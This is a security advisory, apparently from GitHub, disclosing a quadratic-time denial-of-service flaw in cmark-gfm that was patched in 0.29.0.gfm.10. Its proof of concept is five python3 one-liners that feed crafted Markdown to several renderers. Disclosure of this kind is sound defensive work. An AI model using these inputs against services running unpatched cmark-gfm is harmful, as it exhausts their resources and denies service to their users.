Impact

A polynomial time complexity issue in cmark-gfm may lead to unbounded resource exhaustion and subsequent denial of service.

Proof of concept

Each of the commands below triggers a different issue.

python3 -c 'pad = "_" * 10000; print(pad + "." + pad, end="")' | time ./build/src/cmark-gfm --to plaintext
python3 -c 'pad = "_" * 10000; print(pad + "." + pad, end="")' | time ./build/src/cmark-gfm --to commonmark
python3 -c 'n = 10000; print("1.\n" + " 2.\n"*n)' | time ./src/cmark-gfm -t commonmark
python3 -c 'n = 10000; print(" -"*n + "x\n")' | time ./src/cmark-gfm -t xml
python3 -c 'n = 10000; print(" -"*n + "x\n")' | time ./src/cmark-gfm -t man

Increasing the number 10000 in the above commands causes the running time to increase quadratically.

Patches

This vulnerability has been patched in 0.29.0.gfm.10.

Note on cmark and cmark-gfm

cmark-gfm is a fork of cmark that adds the GitHub Flavored Markdown extensions. The two codebases have diverged over time, but share a common core. This bug only affects cmark-gfm as cmark had already patched this issue in their commonmark renderer and they do not contain the plaintext renderer.

Credit

We would like to thank @gravypod for reporting this vulnerability.

References

https://en.wikipedia.org/wiki/Time_complexity

For more information

If you have any questions or comments about this advisory:

• Open an issue in github/cmark-gfm